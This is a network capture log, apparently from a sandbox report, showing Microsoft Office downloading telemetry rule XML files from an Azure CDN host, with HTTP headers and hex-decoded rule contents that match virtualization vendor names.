                                                                                                                                      2024-11-29 22:11:23 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      74192.168.2.44982613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:22 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:23 UTC471INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 479
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                                      x-ms-request-id: 83b34a83-b01e-0053-35ab-42cdf8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221122Z-174f78459684db9fhC1EWRc7g400000000fg000000003127
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:23 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      75192.168.2.44982713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:22 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                      x-ms-request-id: 261fcd2e-101e-005a-5345-40882b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221122Z-174f7845968j6t2phC1EWRcfe800000010tg000000000zxs
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      76192.168.2.44982813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:24 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:24 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 471
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                                      x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221124Z-174f78459688l8rvhC1EWRtzr00000000d3000000000e2p8
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:25 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      77192.168.2.44983113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:24 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:24 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                                      x-ms-request-id: a521520d-601e-003d-19f6-416f25000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221124Z-174f7845968vqt9xhC1EWRgten00000010g000000000gty7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      78192.168.2.44982913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:24 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:24 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                                      x-ms-request-id: abb27c18-501e-008f-0aee-419054000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221124Z-174f7845968n2hr8hC1EWR9cag0000001070000000006kq2
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      79192.168.2.44983013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:24 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:25 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 477
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                                      x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221125Z-174f7845968j6t2phC1EWRcfe800000010kg00000000mq46
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:25 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      80192.168.2.44983213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:24 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:25 UTC471INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:25 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 477
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                                      x-ms-request-id: c5359d4f-401e-0035-67ab-4282d8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221125Z-174f784596886s2bhC1EWR743w00000010pg000000001qea
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:25 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      81192.168.2.44983313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:26 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:26 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                                      x-ms-request-id: 417b9f3b-401e-0029-4091-3f9b43000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221126Z-174f7845968n2hr8hC1EWR9cag000000101g00000000qb6v
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:27 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      82192.168.2.44983513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:26 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:27 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                                                      x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221127Z-174f7845968kdththC1EWRzvxn0000000cxg000000007d9w
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:27 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      83192.168.2.44983413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:27 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:27 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                                      x-ms-request-id: fcd7fe31-301e-0033-0c91-3ffa9c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221127Z-174f7845968kvnqxhC1EWRmf3g0000000m9000000000fqg9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
